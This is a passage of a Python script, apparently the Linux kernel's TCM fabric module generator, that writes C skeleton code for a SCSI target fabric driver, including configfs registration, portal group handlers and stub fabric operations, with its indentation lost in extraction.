buf += " struct config_group *group,\n"
buf += " const char *name)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + "*" + fabric_mod_port + " = container_of(wwn,\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + ", " + fabric_mod_port + "_wwn);\n\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg;\n"
buf += " unsigned long tpgt;\n"
buf += " int ret;\n\n"
buf += " if (strstr(name, \"tpgt_\") != name)\n"
buf += " return ERR_PTR(-EINVAL);\n"
buf += " if (strict_strtoul(name + 5, 10, &tpgt) || tpgt > UINT_MAX)\n"
buf += " return ERR_PTR(-EINVAL);\n\n"
buf += " tpg = kzalloc(sizeof(struct " + fabric_mod_name + "_tpg), GFP_KERNEL);\n"
buf += " if (!(tpg)) {\n"
buf += " printk(KERN_ERR \"Unable to allocate struct " + fabric_mod_name + "_tpg\");\n"
buf += " return ERR_PTR(-ENOMEM);\n"
buf += " }\n"
buf += " tpg->" + fabric_mod_port + " = " + fabric_mod_port + ";\n"
buf += " tpg->" + fabric_mod_port + "_tpgt = tpgt;\n\n"
buf += " ret = core_tpg_register(&" + fabric_mod_name + "_fabric_configfs->tf_ops, wwn,\n"
buf += " &tpg->se_tpg, (void *)tpg,\n"
buf += " TRANSPORT_TPG_TYPE_NORMAL);\n"
buf += " if (ret < 0) {\n"
buf += " kfree(tpg);\n"
buf += " return NULL;\n"
buf += " }\n"
buf += " return &tpg->se_tpg;\n"
buf += "}\n\n"
buf += "static void " + fabric_mod_name + "_drop_tpg(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n\n"
buf += " core_tpg_deregister(se_tpg);\n"
buf += " kfree(tpg);\n"
buf += "}\n\n"
buf += "static struct se_wwn *" + fabric_mod_name + "_make_" + fabric_mod_port + "(\n"
buf += " struct target_fabric_configfs *tf,\n"
buf += " struct config_group *group,\n"
buf += " const char *name)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + ";\n"
if proto_ident == "FC" or proto_ident == "SAS":
buf += " u64 wwpn = 0;\n\n"
buf += " /* if (" + fabric_mod_name + "_parse_wwn(name, &wwpn, 1) < 0)\n"
buf += " return ERR_PTR(-EINVAL); */\n\n"
buf += " " + fabric_mod_port + " = kzalloc(sizeof(struct " + fabric_mod_name + "_" + fabric_mod_port + "), GFP_KERNEL);\n"
buf += " if (!(" + fabric_mod_port + ")) {\n"
buf += " printk(KERN_ERR \"Unable to allocate struct " + fabric_mod_name + "_" + fabric_mod_port + "\");\n"
buf += " return ERR_PTR(-ENOMEM);\n"
buf += " }\n"
if proto_ident == "FC" or proto_ident == "SAS":
buf += " " + fabric_mod_port + "->" + fabric_mod_port + "_wwpn = wwpn;\n"
buf += " /* " + fabric_mod_name + "_format_wwn(&" + fabric_mod_port + "->" + fabric_mod_port + "_name[0], " + fabric_mod_name.upper() + "__NAMELEN, wwpn); */\n\n"
buf += " return &" + fabric_mod_port + "->" + fabric_mod_port + "_wwn;\n"
buf += "}\n\n"
buf += "static void " + fabric_mod_name + "_drop_" + fabric_mod_port + "(struct se_wwn *wwn)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = container_of(wwn,\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + ", " + fabric_mod_port + "_wwn);\n"
buf += " kfree(" + fabric_mod_port + ");\n"
buf += "}\n\n"
buf += "static ssize_t " + fabric_mod_name + "_wwn_show_attr_version(\n"
buf += " struct target_fabric_configfs *tf,\n"
buf += " char *page)\n"
buf += "{\n"
buf += " return sprintf(page, \"" + fabric_mod_name.upper() + " fabric module %s on %s/%s\"\n"
buf += " \"on \"UTS_RELEASE\"\\n\", " + fabric_mod_name.upper() + "_VERSION, utsname()->sysname,\n"
buf += " utsname()->machine);\n"
buf += "}\n\n"
buf += "TF_WWN_ATTR_RO(" + fabric_mod_name + ", version);\n\n"
buf += "static struct configfs_attribute *" + fabric_mod_name + "_wwn_attrs[] = {\n"
buf += " &" + fabric_mod_name + "_wwn_version.attr,\n"
buf += " NULL,\n"
buf += "};\n\n"
buf += "static struct target_core_fabric_ops " + fabric_mod_name + "_ops = {\n"
buf += " .get_fabric_name = " + fabric_mod_name + "_get_fabric_name,\n"
buf += " .get_fabric_proto_ident = " + fabric_mod_name + "_get_fabric_proto_ident,\n"
buf += " .tpg_get_wwn = " + fabric_mod_name + "_get_fabric_wwn,\n"
buf += " .tpg_get_tag = " + fabric_mod_name + "_get_tag,\n"
buf += " .tpg_get_default_depth = " + fabric_mod_name + "_get_default_depth,\n"
buf += " .tpg_get_pr_transport_id = " + fabric_mod_name + "_get_pr_transport_id,\n"
buf += " .tpg_get_pr_transport_id_len = " + fabric_mod_name + "_get_pr_transport_id_len,\n"
buf += " .tpg_parse_pr_out_transport_id = " + fabric_mod_name + "_parse_pr_out_transport_id,\n"
buf += " .tpg_check_demo_mode = " + fabric_mod_name + "_check_false,\n"
buf += " .tpg_check_demo_mode_cache = " + fabric_mod_name + "_check_true,\n"
buf += " .tpg_check_demo_mode_write_protect = " + fabric_mod_name + "_check_true,\n"
buf += " .tpg_check_prod_mode_write_protect = " + fabric_mod_name + "_check_false,\n"
buf += " .tpg_alloc_fabric_acl = " + fabric_mod_name + "_alloc_fabric_acl,\n"
buf += " .tpg_release_fabric_acl = " + fabric_mod_name + "_release_fabric_acl,\n"
buf += " .tpg_get_inst_index = " + fabric_mod_name + "_tpg_get_inst_index,\n"
buf += " .release_cmd_to_pool = " + fabric_mod_name + "_release_cmd,\n"
buf += " .release_cmd_direct = " + fabric_mod_name + "_release_cmd,\n"
buf += " .shutdown_session = " + fabric_mod_name + "_shutdown_session,\n"
buf += " .close_session = " + fabric_mod_name + "_close_session,\n"
buf += " .stop_session = " + fabric_mod_name + "_stop_session,\n"
buf += " .fall_back_to_erl0 = " + fabric_mod_name + "_reset_nexus,\n"
buf += " .sess_logged_in = " + fabric_mod_name + "_sess_logged_in,\n"
buf += " .sess_get_index = " + fabric_mod_name + "_sess_get_index,\n"
buf += " .sess_get_initiator_sid = NULL,\n"
buf += " .write_pending = " + fabric_mod_name + "_write_pending,\n"
buf += " .write_pending_status = " + fabric_mod_name + "_write_pending_status,\n"
buf += " .set_default_node_attributes = " + fabric_mod_name + "_set_default_node_attrs,\n"
buf += " .get_task_tag = " + fabric_mod_name + "_get_task_tag,\n"
buf += " .get_cmd_state = " + fabric_mod_name + "_get_cmd_state,\n"
buf += " .new_cmd_failure = " + fabric_mod_name + "_new_cmd_failure,\n"
buf += " .queue_data_in = " + fabric_mod_name + "_queue_data_in,\n"
buf += " .queue_status = " + fabric_mod_name + "_queue_status,\n"
buf += " .queue_tm_rsp = " + fabric_mod_name + "_queue_tm_rsp,\n"
buf += " .get_fabric_sense_len = " + fabric_mod_name + "_get_fabric_sense_len,\n"
buf += " .set_fabric_sense_len = " + fabric_mod_name + "_set_fabric_sense_len,\n"
buf += " .is_state_remove = " + fabric_mod_name + "_is_state_remove,\n"
buf += " .pack_lun = " + fabric_mod_name + "_pack_lun,\n"
buf += " /*\n"
buf += " * Setup function pointers for generic logic in target_core_fabric_configfs.c\n"
buf += " */\n"
buf += " .fabric_make_wwn = " + fabric_mod_name + "_make_" + fabric_mod_port + ",\n"
buf += " .fabric_drop_wwn = " + fabric_mod_name + "_drop_" + fabric_mod_port + ",\n"
buf += " .fabric_make_tpg = " + fabric_mod_name + "_make_tpg,\n"
buf += " .fabric_drop_tpg = " + fabric_mod_name + "_drop_tpg,\n"
buf += " .fabric_post_link = NULL,\n"
buf += " .fabric_pre_unlink = NULL,\n"
buf += " .fabric_make_np = NULL,\n"
buf += " .fabric_drop_np = NULL,\n"
buf += " .fabric_make_nodeacl = " + fabric_mod_name + "_make_nodeacl,\n"
buf += " .fabric_drop_nodeacl = " + fabric_mod_name + "_drop_nodeacl,\n"
buf += "};\n\n"
buf += "static int " + fabric_mod_name + "_register_configfs(void)\n"
buf += "{\n"
buf += " struct target_fabric_configfs *fabric;\n"
buf += " int ret;\n\n"
buf += " printk(KERN_INFO \"" + fabric_mod_name.upper() + " fabric module %s on %s/%s\"\n"
buf += " \" on \"UTS_RELEASE\"\\n\"," + fabric_mod_name.upper() + "_VERSION, utsname()->sysname,\n"
buf += " utsname()->machine);\n"
buf += " /*\n"
buf += " * Register the top level struct config_item_type with TCM core\n"
buf += " */\n"
buf += " fabric = target_fabric_configfs_init(THIS_MODULE, \"" + fabric_mod_name[4:] + "\");\n"
buf += " if (!(fabric)) {\n"
buf += " printk(KERN_ERR \"target_fabric_configfs_init() failed\\n\");\n"
buf += " return -ENOMEM;\n"
buf += " }\n"
buf += " /*\n"
buf += " * Setup fabric->tf_ops from our local " + fabric_mod_name + "_ops\n"
buf += " */\n"
buf += " fabric->tf_ops = " + fabric_mod_name + "_ops;\n"
buf += " /*\n"
buf += " * Setup default attribute lists for various fabric->tf_cit_tmpl\n"
buf += " */\n"
buf += " TF_CIT_TMPL(fabric)->tfc_wwn_cit.ct_attrs = " + fabric_mod_name + "_wwn_attrs;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_base_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_attrib_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_param_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_np_base_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_nacl_base_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_nacl_attrib_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_nacl_auth_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_nacl_param_cit.ct_attrs = NULL;\n"
buf += " /*\n"
buf += " * Register the fabric for use within TCM\n"
buf += " */\n"
buf += " ret = target_fabric_configfs_register(fabric);\n"
buf += " if (ret < 0) {\n"
buf += " printk(KERN_ERR \"target_fabric_configfs_register() failed\"\n"
buf += " \" for " + fabric_mod_name.upper() + "\\n\");\n"
buf += " return ret;\n"
buf += " }\n"
buf += " /*\n"
buf += " * Setup our local pointer to *fabric\n"
buf += " */\n"
buf += " " + fabric_mod_name + "_fabric_configfs = fabric;\n"
buf += " printk(KERN_INFO \"" + fabric_mod_name.upper() + "[0] - Set fabric -> " + fabric_mod_name + "_fabric_configfs\\n\");\n"
buf += " return 0;\n"
buf += "};\n\n"
buf += "static void " + fabric_mod_name + "_deregister_configfs(void)\n"
buf += "{\n"
buf += " if (!(" + fabric_mod_name + "_fabric_configfs))\n"
buf += " return;\n\n"
buf += " target_fabric_configfs_deregister(" + fabric_mod_name + "_fabric_configfs);\n"
buf += " " + fabric_mod_name + "_fabric_configfs = NULL;\n"
buf += " printk(KERN_INFO \"" + fabric_mod_name.upper() + "[0] - Cleared " + fabric_mod_name + "_fabric_configfs\\n\");\n"
buf += "};\n\n"
buf += "static int __init " + fabric_mod_name + "_init(void)\n"
buf += "{\n"
buf += " int ret;\n\n"
buf += " ret = " + fabric_mod_name + "_register_configfs();\n"
buf += " if (ret < 0)\n"
buf += " return ret;\n\n"
buf += " return 0;\n"
buf += "};\n\n"
buf += "static void " + fabric_mod_name + "_exit(void)\n"
buf += "{\n"
buf += " " + fabric_mod_name + "_deregister_configfs();\n"
buf += "};\n\n"
buf += "#ifdef MODULE\n"
buf += "MODULE_DESCRIPTION(\"" + fabric_mod_name.upper() + " series fabric driver\");\n"
buf += "MODULE_LICENSE(\"GPL\");\n"
buf += "module_init(" + fabric_mod_name + "_init);\n"
buf += "module_exit(" + fabric_mod_name + "_exit);\n"
buf += "#endif\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
return
def tcm_mod_scan_fabric_ops(tcm_dir):
fabric_ops_api = tcm_dir + "include/target/target_core_fabric_ops.h"
print "Using tcm_mod_scan_fabric_ops: " + fabric_ops_api
process_fo = 0;
p = open(fabric_ops_api, 'r')
line = p.readline()
while line:
if process_fo == 0 and re.search('struct target_core_fabric_ops {', line):
line = p.readline()
continue
if process_fo == 0:
process_fo = 1;
line = p.readline()
# Search for function pointer
if not re.search('\(\*', line):
continue
fabric_ops.append(line.rstrip())
continue
line = p.readline()
# Search for function pointer
if not re.search('\(\*', line):
continue
fabric_ops.append(line.rstrip())
p.close()
return
def tcm_mod_dump_fabric_ops(proto_ident, fabric_mod_dir_var, fabric_mod_name):
buf = ""
bufi = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_fabric.c"
print "Writing file: " + f
p = open(f, 'w')
if not p:
tcm_mod_err("Unable to open file: " + f)
fi = fabric_mod_dir_var + "/" + fabric_mod_name + "_fabric.h"
print "Writing file: " + fi
pi = open(fi, 'w')
if not pi:
tcm_mod_err("Unable to open file: " + fi)
buf = "#include <linux/slab.h>\n"
buf += "#include <linux/kthread.h>\n"
buf += "#include <linux/types.h>\n"
buf += "#include <linux/list.h>\n"
buf += "#include <linux/types.h>\n"
buf += "#include <linux/string.h>\n"
buf += "#include <linux/ctype.h>\n"
buf += "#include <asm/unaligned.h>\n"
buf += "#include <scsi/scsi.h>\n"
buf += "#include <scsi/scsi_host.h>\n"
buf += "#include <scsi/scsi_device.h>\n"
buf += "#include <scsi/scsi_cmnd.h>\n"
buf += "#include <scsi/libfc.h>\n\n"
buf += "#include <target/target_core_base.h>\n"
buf += "#include <target/target_core_transport.h>\n"
buf += "#include <target/target_core_fabric_ops.h>\n"
buf += "#include <target/target_core_fabric_lib.h>\n"
buf += "#include <target/target_core_device.h>\n"
buf += "#include <target/target_core_tpg.h>\n"
buf += "#include <target/target_core_configfs.h>\n\n"
buf += "#include \"" + fabric_mod_name + "_base.h\"\n"
buf += "#include \"" + fabric_mod_name + "_fabric.h\"\n\n"
buf += "int " + fabric_mod_name + "_check_true(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " return 1;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_check_true(struct se_portal_group *);\n"
buf += "int " + fabric_mod_name + "_check_false(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_check_false(struct se_portal_group *);\n"
total_fabric_ops = len(fabric_ops)
i = 0
while i < total_fabric_ops:
fo = fabric_ops[i]
i += 1
# print "fabric_ops: " + fo
if re.search('get_fabric_name', fo):
buf += "char *" + fabric_mod_name + "_get_fabric_name(void)\n"
buf += "{\n"
buf += " return \"" + fabric_mod_name[4:] + "\";\n"
buf += "}\n\n"
bufi += "char *" + fabric_mod_name + "_get_fabric_name(void);\n"
continue
if re.search('get_fabric_proto_ident', fo):
buf += "u8 " + fabric_mod_name + "_get_fabric_proto_ident(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n"
buf += " u8 proto_id;\n\n"
buf += " switch (" + fabric_mod_port + "->" + fabric_mod_port + "_proto_id) {\n"
if proto_ident == "FC":
buf += " case SCSI_PROTOCOL_FCP:\n"
buf += " default:\n"
buf += " proto_id = fc_get_fabric_proto_ident(se_tpg);\n"
buf += " break;\n"
elif proto_ident == "SAS":
buf += " case SCSI_PROTOCOL_SAS:\n"
buf += " default:\n"
buf += " proto_id = sas_get_fabric_proto_ident(se_tpg);\n"
buf += " break;\n"
elif proto_ident == "iSCSI":
buf += " case SCSI_PROTOCOL_ISCSI:\n"
buf += " default:\n"
buf += " proto_id = iscsi_get_fabric_proto_ident(se_tpg);\n"
buf += " break;\n"
buf += " }\n\n"
buf += " return proto_id;\n"
buf += "}\n\n"
bufi += "u8 " + fabric_mod_name + "_get_fabric_proto_ident(struct se_portal_group *);\n"
if re.search('get_wwn', fo):
buf += "char *" + fabric_mod_name + "_get_fabric_wwn(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n\n"
buf += " return &" + fabric_mod_port + "->" + fabric_mod_port + "_name[0];\n"
buf += "}\n\n"
bufi += "char *" + fabric_mod_name + "_get_fabric_wwn(struct se_portal_group *);\n"
if re.search('get_tag', fo):
buf += "u16 " + fabric_mod_name + "_get_tag(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " return tpg->" + fabric_mod_port + "_tpgt;\n"
buf += "}\n\n"
bufi += "u16 " + fabric_mod_name + "_get_tag(struct se_portal_group *);\n"
if re.search('get_default_depth', fo):
buf += "u32 " + fabric_mod_name + "_get_default_depth(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " return 1;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_get_default_depth(struct se_portal_group *);\n"
if re.search('get_pr_transport_id\)\(', fo):
buf += "u32 " + fabric_mod_name + "_get_pr_transport_id(\n"
buf += " struct se_portal_group *se_tpg,\n"
buf += " struct se_node_acl *se_nacl,\n"
buf += " struct t10_pr_registration *pr_reg,\n"
buf += " int *format_code,\n"
buf += " unsigned char *buf)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n"
buf += " int ret = 0;\n\n"
buf += " switch (" + fabric_mod_port + "->" + fabric_mod_port + "_proto_id) {\n"
if proto_ident == "FC":
buf += " case SCSI_PROTOCOL_FCP:\n"
buf += " default:\n"
buf += " ret = fc_get_pr_transport_id(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code, buf);\n"
buf += " break;\n"
elif proto_ident == "SAS":
buf += " case SCSI_PROTOCOL_SAS:\n"
buf += " default:\n"
buf += " ret = sas_get_pr_transport_id(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code, buf);\n"
buf += " break;\n"
elif proto_ident == "iSCSI":
buf += " case SCSI_PROTOCOL_ISCSI:\n"
buf += " default:\n"
buf += " ret = iscsi_get_pr_transport_id(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code, buf);\n"
buf += " break;\n"
buf += " }\n\n"
buf += " return ret;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_get_pr_transport_id(struct se_portal_group *,\n"
bufi += " struct se_node_acl *, struct t10_pr_registration *,\n"
bufi += " int *, unsigned char *);\n"
if re.search('get_pr_transport_id_len\)\(', fo):
buf += "u32 " + fabric_mod_name + "_get_pr_transport_id_len(\n"
buf += " struct se_portal_group *se_tpg,\n"
buf += " struct se_node_acl *se_nacl,\n"
buf += " struct t10_pr_registration *pr_reg,\n"
buf += " int *format_code)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n"
buf += " int ret = 0;\n\n"
buf += " switch (" + fabric_mod_port + "->" + fabric_mod_port + "_proto_id) {\n"
if proto_ident == "FC":
buf += " case SCSI_PROTOCOL_FCP:\n"
buf += " default:\n"
buf += " ret = fc_get_pr_transport_id_len(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code);\n"
buf += " break;\n"
elif proto_ident == "SAS":
buf += " case SCSI_PROTOCOL_SAS:\n"
buf += " default:\n"
buf += " ret = sas_get_pr_transport_id_len(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code);\n"
buf += " break;\n"
elif proto_ident == "iSCSI":
buf += " case SCSI_PROTOCOL_ISCSI:\n"
buf += " default:\n"
buf += " ret = iscsi_get_pr_transport_id_len(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code);\n"
buf += " break;\n"
buf += " }\n\n"
buf += " return ret;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_get_pr_transport_id_len(struct se_portal_group *,\n"
bufi += " struct se_node_acl *, struct t10_pr_registration *,\n"
bufi += " int *);\n"
if re.search('parse_pr_out_transport_id\)\(', fo):
buf += "char *" + fabric_mod_name + "_parse_pr_out_transport_id(\n"
buf += " struct se_portal_group *se_tpg,\n"
buf += " const char *buf,\n"
buf += " u32 *out_tid_len,\n"
buf += " char **port_nexus_ptr)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n"
buf += " char *tid = NULL;\n\n"
buf += " switch (" + fabric_mod_port + "->" + fabric_mod_port + "_proto_id) {\n"
if proto_ident == "FC":
buf += " case SCSI_PROTOCOL_FCP:\n"
buf += " default:\n"
buf += " tid = fc_parse_pr_out_transport_id(se_tpg, buf, out_tid_len,\n"
buf += " port_nexus_ptr);\n"
elif proto_ident == "SAS":
buf += " case SCSI_PROTOCOL_SAS:\n"
buf += " default:\n"
buf += " tid = sas_parse_pr_out_transport_id(se_tpg, buf, out_tid_len,\n"
buf += " port_nexus_ptr);\n"
elif proto_ident == "iSCSI":
buf += " case SCSI_PROTOCOL_ISCSI:\n"
buf += " default:\n"
buf += " tid = iscsi_parse_pr_out_transport_id(se_tpg, buf, out_tid_len,\n"
buf += " port_nexus_ptr);\n"
buf += " }\n\n"
buf += " return tid;\n"
buf += "}\n\n"
bufi += "char *" + fabric_mod_name + "_parse_pr_out_transport_id(struct se_portal_group *,\n"
bufi += " const char *, u32 *, char **);\n"
if re.search('alloc_fabric_acl\)\(', fo):
buf += "struct se_node_acl *" + fabric_mod_name + "_alloc_fabric_acl(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_nacl *nacl;\n\n"
buf += " nacl = kzalloc(sizeof(struct " + fabric_mod_name + "_nacl), GFP_KERNEL);\n"
buf += " if (!(nacl)) {\n"
buf += " printk(KERN_ERR \"Unable to alocate struct " + fabric_mod_name + "_nacl\\n\");\n"
buf += " return NULL;\n"
buf += " }\n\n"
buf += " return &nacl->se_node_acl;\n"
buf += "}\n\n"
bufi += "struct se_node_acl *" + fabric_mod_name + "_alloc_fabric_acl(struct se_portal_group *);\n"
if re.search('release_fabric_acl\)\(', fo):
buf += "void " + fabric_mod_name + "_release_fabric_acl(\n"
buf += " struct se_portal_group *se_tpg,\n"
buf += " struct se_node_acl *se_nacl)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_nacl *nacl = container_of(se_nacl,\n"
buf += " struct " + fabric_mod_name + "_nacl, se_node_acl);\n"
buf += " kfree(nacl);\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_release_fabric_acl(struct se_portal_group *,\n"
bufi += " struct se_node_acl *);\n"
if re.search('tpg_get_inst_index\)\(', fo):
buf += "u32 " + fabric_mod_name + "_tpg_get_inst_index(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " return 1;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_tpg_get_inst_index(struct se_portal_group *);\n"
if re.search('release_cmd_to_pool', fo):
buf += "void " + fabric_mod_name + "_release_cmd(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_release_cmd(struct se_cmd *);\n"
if re.search('shutdown_session\)\(', fo):
buf += "int " + fabric_mod_name + "_shutdown_session(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_shutdown_session(struct se_session *);\n"
if re.search('close_session\)\(', fo):
buf += "void " + fabric_mod_name + "_close_session(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_close_session(struct se_session *);\n"
if re.search('stop_session\)\(', fo):
buf += "void " + fabric_mod_name + "_stop_session(struct se_session *se_sess, int sess_sleep , int conn_sleep)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_stop_session(struct se_session *, int, int);\n"
if re.search('fall_back_to_erl0\)\(', fo):
buf += "void " + fabric_mod_name + "_reset_nexus(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_reset_nexus(struct se_session *);\n"
if re.search('sess_logged_in\)\(', fo):
buf += "int " + fabric_mod_name + "_sess_logged_in(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_sess_logged_in(struct se_session *);\n"
if re.search('sess_get_index\)\(', fo):
buf += "u32 " + fabric_mod_name + "_sess_get_index(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_sess_get_index(struct se_session *);\n"
if re.search('write_pending\)\(', fo):
buf += "int " + fabric_mod_name + "_write_pending(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_write_pending(struct se_cmd *);\n"
if re.search('write_pending_status\)\(', fo):
buf += "int " + fabric_mod_name + "_write_pending_status(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_write_pending_status(struct se_cmd *);\n"
if re.search('set_default_node_attributes\)\(', fo):
buf += "void " + fabric_mod_name + "_set_default_node_attrs(struct se_node_acl *nacl)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_set_default_node_attrs(struct se_node_acl *);\n"
if re.search('get_task_tag\)\(', fo):
buf += "u32 " + fabric_mod_name + "_get_task_tag(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_get_task_tag(struct se_cmd *);\n"
if re.search('get_cmd_state\)\(', fo):
buf += "int " + fabric_mod_name + "_get_cmd_state(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_get_cmd_state(struct se_cmd *);\n"
if re.search('new_cmd_failure\)\(', fo):
buf += "void " + fabric_mod_name + "_new_cmd_failure(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_new_cmd_failure(struct se_cmd *);\n"
if re.search('queue_data_in\)\(', fo):
buf += "int " + fabric_mod_name + "_queue_data_in(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_queue_data_in(struct se_cmd *);\n"
if re.search('queue_status\)\(', fo):
buf += "int " + fabric_mod_name + "_queue_status(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_queue_status(struct se_cmd *);\n"
if re.search('queue_tm_rsp\)\(', fo):
buf += "int " + fabric_mod_name + "_queue_tm_rsp(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_queue_tm_rsp(struct se_cmd *);\n"
if re.search('get_fabric_sense_len\)\(', fo):
buf += "u16 " + fabric_mod_name + "_get_fabric_sense_len(void)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "u16 " + fabric_mod_name + "_get_fabric_sense_len(void);\n"
if re.search('set_fabric_sense_len\)\(', fo):
buf += "u16 " + fabric_mod_name + "_set_fabric_sense_len(struct se_cmd *se_cmd, u32 sense_length)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "u16 " + fabric_mod_name + "_set_fabric_sense_len(struct se_cmd *, u32);\n"
if re.search('is_state_remove\)\(', fo):
buf += "int " + fabric_mod_name + "_is_state_remove(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_is_state_remove(struct se_cmd *);\n"
if re.search('pack_lun\)\(', fo):
buf += "u64 " + fabric_mod_name + "_pack_lun(unsigned int lun)\n"
buf += "{\n"
buf += " WARN_ON(lun >= 256);\n"
buf += " /* Caller wants this byte-swapped */\n"
buf += " return cpu_to_le64((lun & 0xff) << 8);\n"
buf += "}\n\n"
bufi += "u64 " + fabric_mod_name + "_pack_lun(unsigned int);\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
ret = pi.write(bufi)
if ret:
tcm_mod_err("Unable to write fi: " + fi)
pi.close()
return
def tcm_mod_build_kbuild(fabric_mod_dir_var, fabric_mod_name):
buf = ""
